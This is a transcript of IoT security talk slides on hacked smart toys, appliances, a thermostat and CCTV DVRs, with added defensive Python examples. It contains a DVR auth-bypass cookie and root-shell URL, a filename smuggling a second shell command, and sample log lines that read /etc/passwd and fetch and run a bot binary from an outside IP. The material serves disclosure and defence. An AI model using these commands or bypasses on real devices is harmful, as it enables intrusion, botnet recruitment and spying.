Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!
Transcript of Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!
![Page 1: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/1.jpg)
Bought a smart toy for Xmas?
![Page 2: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/2.jpg)
Who am I?
An IoT security researcher
Part of a team of 50 who carry out extensive research into IoT security at @pentestpartners
We help manufacturers secure their IoT products
Known for public research into hacking Mitsubishi vehicles, My Friend Cayla, wi-fi kettles, Samsung smart TVs, fridges and much more
![Page 3: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/3.jpg)
First, some fun
![Page 4: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/4.jpg)
A Wi-Fi kettle
A Wi-Fi enabled kettle, essential for every home
Comes with mobile app, from which kettle can be boiled
Offers stunning time saving, at a £100 premium over a regular non-smart kettle
![Page 5: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/5.jpg)
How to hack a kettle
#1 port scan
#2 take it apart
#3 locate chipset manuals
#4 review source code
#5 find code fails
#6 make tea!
![Page 6: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/6.jpg)
![Page 7: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/7.jpg)
Wi-Fi is trackable. Find kettles to steal Wi-Fi security key from:
![Page 8: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/8.jpg)
Their latest releases
iKettle 3.0 – much more secure. I would use one!
Coffee machine 2.0, uses a chipset that doesn’t offer much security
Latest products much improved
![Page 9: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/9.jpg)
Now for some swearing
![Page 10: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/10.jpg)
My Friend Cayla
Interactive kids’ doll
Voice recognition, listens continuously whilst powered on
“Internet Safe” “Kid friendly”
Anti-profanity filters
… so can we make her swear?
… could someone use her to spy on kids?
![Page 11: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/11.jpg)
Hacking Cayla
Wikipedia API
Evil API
No Bluetooth PIN
Voice recognition
Local question database + ‘badwords’ list
MITM
Modify unencrypted data in transit
Evil phone, modified app
Modify SQLite DB contents
Tamper with anti-swearing process
API call broken when Wikipedia enforced SSL!
![Page 12: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/12.jpg)
Putting it right
Manufacturer clearly doesn’t ‘get’ security
“We will be issuing an update to the mobile app to fix the issues raised” – except they didn’t
Implementing SSL will help, so long as certificate pinning is enforced
Otherwise, MITM again
But the Bluetooth promiscuity cannot be fixed, as there is no security in the pairing process
![Page 13: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/13.jpg)
Vendor updates the app
Our attack stopped working a while back, after the application was finally updated
They ‘fixed’ it by encrypting the database contents with SQLCipher
Er – ignoring the issues that actually mattered
![Page 14: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/14.jpg)
My Friend Freddy Bear
Nothing changes…
Whilst reverse engineering the iOS version of Cayla’s app, another researcher (Tim Medin) found a ‘machine gun’ sound file in her code
Action Cayla?
Freddy Bear shipped last Xmas, equally vulnerable
Slightly more annoying
German app is different to UK & US apps…
![Page 15: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/15.jpg)
Even swearier
![Page 16: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/16.jpg)
Teksta Toucan
Same vendor as Cayla
Same security flaws
This Toucan needs to be banned urgently!
![Page 17: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/17.jpg)
Teksta Tekno puppy
No Bluetooth, BUT has voice recognition
Firmware contained on flash memory with no read-out protection
![Page 18: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/18.jpg)
BB-8
Firmware pushed from mobile app over plain HTTP
Potential to intercept and modify. Turn to the…
Cool vendor – reported and fixed in 10 days!
![Page 19: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/19.jpg)
Anki Cozmo
Smart toys CAN be secure
Unique keys per device, loaded at factory
Why can’t all smart toys be like this?
![Page 20: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/20.jpg)
Things that listen
![Page 21: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/21.jpg)
Samsung Internet TV
Audio sent to Nuance Communications for voice->text conversion
Both directions plaintext
![Page 22: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/22.jpg)
Echo!
Amazing voice recognition and sensitivity, will respond to any voice without training
Alexa voice/IoT integration is pretty secure
What do you control with it? The amazing August smart door lock?
Stand outside window, say ‘unlock door’ ?
![Page 23: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/23.jpg)
Are you having a laugh?
Stand outside window, ‘unlock BMW’
Car on drive unlocks, code key, drive off?
![Page 24: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/24.jpg)
Nespresso Prodigio
But it can get more interesting
This machine integrates Bluetooth remote control PLUS ecommerce functionality
Interesting value add for manufacturer
The mobile app has permissions to make calls silently without user interaction!
We can take control of it, but more concerning is potential to tamper with payment processes
![Page 25: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/25.jpg)
Samsung Smart Fridge
Samsung RF28HMELBSR Smart Fridge
View Google calendars, weather, recipes, TV etc
Did I say ‘utterly pointless’?
SSL connection is not ‘pinned’ so hacker can intercept and steal your email credentials from your refrigerator!
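Both the Cayla fix ("SSL will help, so long as certificate pinning is enforced") and the fridge finding ("SSL connection is not pinned") come down to the same check, so here is an added example of what a pinned client does that an unpinned one does not. This is illustrative code written for this page, not Pen Test Partners’ tooling nor any vendor’s app code; the two DER certificate blobs and the pin set are constructed placeholders, and the host/port in `connect_pinned` are whatever the reader supplies.

```python
import hashlib
import hmac
import socket
import ssl

# Pin set: "sha256/<hex>" over the server's DER-encoded certificate. Ship at least one
# backup pin so a routine certificate rotation doesn't brick every device in the field.
# The two DER blobs below are constructed placeholders, not real certificates.
CURRENT_CERT_DER = b"\x30\x82\x01\x00constructed-current-cert"
BACKUP_CERT_DER = b"\x30\x82\x01\x00constructed-backup-cert"


def cert_pin(der_cert: bytes) -> str:
    """Pin string for a DER certificate (same shape as HPKP / OkHttp pins, here over the whole cert)."""
    return "sha256/" + hashlib.sha256(der_cert).hexdigest()


PINS = frozenset({cert_pin(CURRENT_CERT_DER), cert_pin(BACKUP_CERT_DER)})


def pin_matches(der_cert: bytes, pins=PINS) -> bool:
    """True only if the presented certificate hashes to one of our pins.

    A MITM certificate issued by a CA the phone trusts (a proxy CA the attacker
    installed on a rooted handset, or a compromised public CA) passes normal chain
    validation but fails here, because its hash is not in the pin set.
    """
    observed = cert_pin(der_cert)
    return any(hmac.compare_digest(observed, p) for p in pins)


def connect_pinned(host: str, port: int = 443, pins=PINS, timeout: float = 5.0) -> ssl.SSLSocket:
    """Open a TLS connection that does chain + hostname validation AND the pin check."""
    ctx = ssl.create_default_context()          # CERT_REQUIRED, check_hostname=True
    raw = socket.create_connection((host, port), timeout=timeout)
    try:
        tls = ctx.wrap_socket(raw, server_hostname=host)
    except Exception:
        raw.close()
        raise
    der = tls.getpeercert(binary_form=True)
    if der is None or not pin_matches(der, pins):
        tls.close()
        raise ssl.SSLCertVerificationError(
            f"pin mismatch for {host}: presented {cert_pin(der or b'')}")
    return tls


if __name__ == "__main__":
    print("legit cert accepted  :", pin_matches(CURRENT_CERT_DER))
    print("rotated-to-backup ok :", pin_matches(BACKUP_CERT_DER))
    print("MITM cert accepted   :", pin_matches(b"\x30\x82\x01\x00proxy-ca-issued-cert"))
```

In production you would normally pin the SubjectPublicKeyInfo rather than the whole certificate, so that a re-issued certificate for the same key keeps working, and keep a backup pin for the next key. Note what pinning does not cover: it protects the app-to-cloud leg only, which is why the doll’s unauthenticated Bluetooth pairing stays broken regardless.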
![Page 26: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/26.jpg)
Kids Tablets
![Page 27: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/27.jpg)
Tesco Hudl, £120 – popular gift for kids
Hudl based on Rockchip CPU
Ran native Android
Rockchip CPU exploit allows read from firmware in addition to write
Read any user data without needing the PIN
Factory reset did not wipe data
Tesco replaced hudl with hudl 2 shortly after we reported this. Cool vendor
![Page 28: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/28.jpg)
2017 – it’s still happening
Despite extensive media coverage, several vulnerable products continued to ship after the hudl was withdrawn
Aldi Medion Lifetab
Argos MyTablet
Both were also withdrawn in 2015
However, VTech Innotab Max is STILL SHIPPING in 2017.
Only yesterday VTech settled hacking case with FTC for $650,000
![Page 29: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/29.jpg)
Holding your IoT to ransom
![Page 30: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/30.jpg)
Ransomware
Could we take control of a smart thermostat?
Could we lock the user out and hold their heating/cooling to ransom?
A likely candidate found on Amazon
Quick check of FCC search suggested ARM/Linux
![Page 31: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/31.jpg)
Unpacking firmware
BINGO! We have the filesystem
![Page 32: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/32.jpg)
Examining firmware
Remember SQL injection for web applications?
We can carry out similar attacks against the device’s operating system using command injection
User input is not validated in some cases
The upload function for the screen background image does not validate the filename correctly, so arbitrary commands can be executed
The developer gave no thought to attackers getting hold of the firmware:
![Page 33: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/33.jpg)
More developer issues
This dev really didn’t think their code would ever be seen!
![Page 34: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/34.jpg)
Taking control
Now we can upload a shell and gain full control of the thermostat; it even survives a reboot – APT?
Create an IRC channel so we can control the stat remotely
Change the screen lock PIN to lock the user out
Change the screen background to some ransomware
Send on/off messages to boiler & a/c 3 times per second until they fail
All because a filename was implicitly trusted by device
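The whole thermostat takeover hinges on one filename being pasted into a shell command, so here is an added example of that bug class beside its fix. This is illustrative code written for this page, not the thermostat’s firmware (which is not published here) nor Pen Test Partners’ exploit; the directory names, the `cp` command and the `bg.png; echo INJECTED` payload are constructed for the demonstration, standing in for the reverse shell an attacker would actually use.

```python
import re
import subprocess
import tempfile
from pathlib import Path

# Only plain names are acceptable for an uploaded background image: no path separators,
# no shell metacharacters, a fixed extension and a sane length.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.(?:png|jpg|jpeg)")


def vulnerable_command(upload_dir: Path, bg_dir: Path, filename: str) -> str:
    """Reconstruction of the bug class: the client-supplied filename is pasted straight into
    a shell command line. The shell, not the thermostat, decides where the filename ends."""
    return f"cp {upload_dir}/{filename} {bg_dir}/background.png"


def vulnerable_store(upload_dir: Path, bg_dir: Path, filename: str) -> str:
    """Runs that string through /bin/sh, exactly the mistake described above. Returns stdout."""
    proc = subprocess.run(vulnerable_command(upload_dir, bg_dir, filename),
                          shell=True, capture_output=True, text=True)
    return proc.stdout


def is_safe_filename(filename: str) -> bool:
    return SAFE_NAME.fullmatch(filename) is not None


def hardened_store(upload_dir: Path, bg_dir: Path, filename: str) -> Path:
    """Validate first, then do the copy with no shell involved at all."""
    if not is_safe_filename(filename):
        raise ValueError(f"rejected upload name {filename!r}")
    src = (upload_dir / filename).resolve()
    if src.parent != upload_dir.resolve():            # belt and braces against traversal
        raise ValueError("path escapes upload directory")
    dest = bg_dir / "background.png"
    # argv list, shell=False: metacharacters in the name are just bytes in one argument.
    subprocess.run(["cp", str(src), str(dest)], check=True)
    return dest


def demo() -> dict:
    """Constructed scenario: an 'upload' whose filename carries a shell payload."""
    base = Path(tempfile.mkdtemp())
    upload_dir, bg_dir = base / "upload", base / "bg"
    upload_dir.mkdir()
    bg_dir.mkdir()
    (upload_dir / "bg.png").write_bytes(b"\x89PNG constructed")
    payload = "bg.png; echo INJECTED"      # on the real device: a reverse shell or IRC bot
    result = {"vulnerable_stdout": vulnerable_store(upload_dir, bg_dir, payload)}
    try:
        hardened_store(upload_dir, bg_dir, payload)
        result["hardened_rejected"] = False
    except ValueError:
        result["hardened_rejected"] = True
    result["hardened_legit"] = hardened_store(upload_dir, bg_dir, "bg.png").exists()
    return result


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v!r}")
```

The vulnerable path prints `INJECTED` because `;` terminates the `cp` and starts a second command; the hardened path never gives the shell a chance to parse the name, and rejects it anyway because it fails the allow-list. Validation by allow-list plus `shell=False` is the combination to aim for; escaping with `shlex.quote` is a fallback for the rare case where a shell is unavoidable.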
![Page 35: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/35.jpg)
Smart watches
![Page 36: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/36.jpg)
![Page 39: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/39.jpg)
Mirai: kills Facebook for 2 hours
![Page 40: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/40.jpg)
IoT DVR for CCTV
Hard disc on the DVR records your CCTV
You can view your CCTV remotely on a mobile app
Opens port 80 inbound from the internet
Could we steal personal data AND take down the internet with one device?
![Page 41: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/41.jpg)
MVPower DVR
~44,000 on shodanhq.com
Search for “JAWS/1.0”
![Page 42: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/42.jpg)
MVPower DVR – Very bad...
Easy to bypass web authentication by changing cookie values
dvr_usr = <anyusername>
dvr_password = <anypassword>
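An authentication check that can be satisfied by typing any two cookie values is trusting the client to have already logged in. Here, as an added example not taken from the DVR’s firmware (which is not published here) or from Pen Test Partners, is a reconstruction of that bug class next to a server-issued, HMAC-signed session cookie that a client cannot forge. The cookie names `dvr_usr`/`dvr_password` come from the slide; `dvr_session`, the `admin` account, its password and the PBKDF2 parameters are assumptions for the demonstration.

```python
import hashlib
import hmac
import os
import time
from typing import Optional

# --- The bug class (hypothetical reconstruction of the vulnerable handler) ------------------

def vulnerable_is_authenticated(cookies: dict) -> bool:
    """Treats the mere presence of the two cookies as proof that the login page set them.
    Any client can type them in, so any values at all get through."""
    return bool(cookies.get("dvr_usr")) and bool(cookies.get("dvr_password"))


# --- Hardened form: server-issued, HMAC-signed, expiring session token ----------------------

# Generated at first boot on a real device and persisted; never a constant baked into firmware.
SERVER_KEY = os.urandom(32)
PBKDF2_ROUNDS = 200_000

# Constructed credential store: per-account salt + PBKDF2-SHA256 hash of the password.
_SALT = os.urandom(16)
_USERS = {"admin": (_SALT, hashlib.pbkdf2_hmac("sha256", b"correct horse battery", _SALT, PBKDF2_ROUNDS))}


def check_login(username: str, password: str) -> bool:
    entry = _USERS.get(username)
    if entry is None:
        # burn the same work for unknown users so response time doesn't reveal valid names
        hashlib.pbkdf2_hmac("sha256", password.encode(), b"\0" * 16, PBKDF2_ROUNDS)
        return False
    salt, stored = entry
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(stored, candidate)


def issue_session(username: str, ttl: int = 3600, now: Optional[float] = None) -> str:
    """Cookie value: username|expiry|HMAC(username|expiry). Only the server holds the key."""
    exp = int((time.time() if now is None else now) + ttl)
    payload = f"{username}|{exp}"
    mac = hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}|{mac}"


def login(username: str, password: str) -> Optional[str]:
    """What the login handler hands back as the Set-Cookie value, or None on failure."""
    return issue_session(username) if check_login(username, password) else None


def hardened_is_authenticated(cookies: dict, now: Optional[float] = None) -> bool:
    token = cookies.get("dvr_session", "")
    parts = token.rsplit("|", 2)
    if len(parts) != 3 or not parts[1].isdigit():
        return False
    username, exp, mac = parts
    expected = hmac.new(SERVER_KEY, f"{username}|{exp}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, mac):          # forged or tampered token
        return False
    if int(exp) <= (time.time() if now is None else now):   # expired
        return False
    return username in _USERS


if __name__ == "__main__":
    forged = {"dvr_usr": "anyone", "dvr_password": "whatever"}
    print("vulnerable accepts forged cookies:", vulnerable_is_authenticated(forged))
    print("hardened accepts forged cookies  :", hardened_is_authenticated(forged))
    cookie = login("admin", "correct horse battery")
    print("hardened accepts real login      :", hardened_is_authenticated({"dvr_session": cookie}))
```

The essential change is that the server, not the browser, is the source of truth: the cookie carries nothing a client can set for itself, and every claim in it is bound to a key that never leaves the device. Compare the two checks against `hmac.compare_digest` rather than `==` so the comparison cannot be timed byte by byte.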
![Page 43: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/43.jpg)
MVPower DVR – It gets worse....
Remote root shell available
http://<hostname/IP>/shell?<command>
Available whenever the webserver is running
Web server needed to use the device
Can’t get much worse.....can it?
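The unauthenticated `/shell?<command>` endpoint and the `JAWS/1.0` banner that Shodan keys on are both easy to spot from the defender’s side, so here is an added example of detection logic run over web-server log lines, written for this page rather than taken from any vendor or from Pen Test Partners. The log lines are constructed in common log format (not captured from a real DVR) and the request targets and IPs in them are illustrative.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines in common log format, as a perimeter proxy or the DVR's
# own syslog might show them. Not captured from a real device.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jan/2018:03:14:07 +0000] "GET /shell?cat%20/etc/passwd HTTP/1.1" 200 1843
203.0.113.7 - - [12/Jan/2018:03:14:09 +0000] "GET /shell?wget%20http://203.0.113.9/bot.arm%20-O%20/tmp/b;chmod%20%2Bx%20/tmp/b;/tmp/b HTTP/1.1" 200 0
198.51.100.23 - - [12/Jan/2018:03:15:00 +0000] "GET /login.html HTTP/1.1" 200 512
198.51.100.23 - - [12/Jan/2018:03:15:02 +0000] "GET /cgi-bin/snapshot.cgi HTTP/1.1" 200 40123
192.0.2.44 - - [12/Jan/2018:03:16:41 +0000] "GET /shell HTTP/1.1" 400 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def shell_command_from_target(target: str):
    """Decoded command if the request hits the JAWS /shell endpoint with a query, else None."""
    parts = urlsplit(target)
    if parts.path != "/shell" or not parts.query:
        return None
    return unquote_plus(parts.query)


def find_shell_hits(log_text: str) -> list:
    """One record per exploitation attempt: who, when, what they ran, what the server said."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        cmd = shell_command_from_target(m["target"])
        if cmd is not None:
            hits.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]), "command": cmd})
    return hits


def is_jaws_banner(response_head: bytes) -> bool:
    """True if an HTTP response head carries the Server: JAWS/1.0 banner used in the Shodan search."""
    for raw in response_head.split(b"\r\n"):
        name, _, value = raw.partition(b":")
        if name.strip().lower() == b"server" and value.strip().startswith(b"JAWS/1.0"):
            return True
    return False


if __name__ == "__main__":
    for hit in find_shell_hits(SAMPLE_LOG):
        print(f"{hit['ts']}  {hit['ip']:<15} HTTP {hit['status']}  {hit['command']}")
```

A `200` on `/shell?` is the signal that matters: the command ran. The second constructed line is the classic bot-drop sequence (fetch an ARM binary to `/tmp`, make it executable, run it), which is exactly how a DVR becomes part of a Mirai-style botnet. Running `is_jaws_banner` against your own external address space finds the devices before Shodan’s users do.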
![Page 44: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/44.jpg)
MVPower DVR – appalling privacy invasion
Still images of your CCTV video sent to developers email address
Apparently this was pre-release testing firmware that made its way in to production
No response to disclosure attempts, until we Rickrolled him, frame by frame
![Page 45: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/45.jpg)
![Page 46: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/46.jpg)
Consequence
Mirai v1 knocked many social networks off the internet for ~2 hours in October 2016
Lack of persistence means that botnet operators are competing for control, so no huge botnets have yet been built
Vulnerabilities overlooked in just one IoT device family (XiongMai ‘XM’-based DVRs) allowed creation of a botnet capable of >1 Tb/s of DDoS
This risk is significant: are your IoT devices the next source of an attack?
![Page 47: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/47.jpg)
New Laws around IoT
![Page 48: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/48.jpg)
My Friend Cayla
German telecoms regulator bans Cayla
On grounds that she has ‘covert audio bugging capability’
EUR 25,000 fine for possession
Legal cases around IoT emerging
![Page 49: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/49.jpg)
US Senate draft IoT security bill
A great step in the right direction
US government departments and agencies may not use IoT devices that do not comply with basic security standards
Some issues requiring debate, though this bill is almost beautifully simple
![Page 50: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/50.jpg)
Efforts in the EU
Various EU publications and drafts
ENISA making progress
Julia Reda (Greens/EFA)
“State of the Cyber: 10 proposals for improving IT security in the EU”
![Page 51: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/51.jpg)
Standards and good guidance
It is already out there:
OWASP
IoTSF
GSMA
etc
Plenty of lobbyists and IoT researchers!
@iamthecavalry
@internetofshit
![Page 52: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/52.jpg)
Regulation, Legislation and Litigation
![Page 53: Bought a Smart Toy for Someone at Christmas? I Hope You Kept the Receipt!](https://reader031.fdocuments.in/reader031/viewer/2022030317/5a6506767f8b9ac75b8b4923/html5/thumbnails/53.jpg)
@thekenmunroshow
@pentestpartners
Blog: www.pentestpartners.com – full of useful advice
If you need help with your IoT security, call us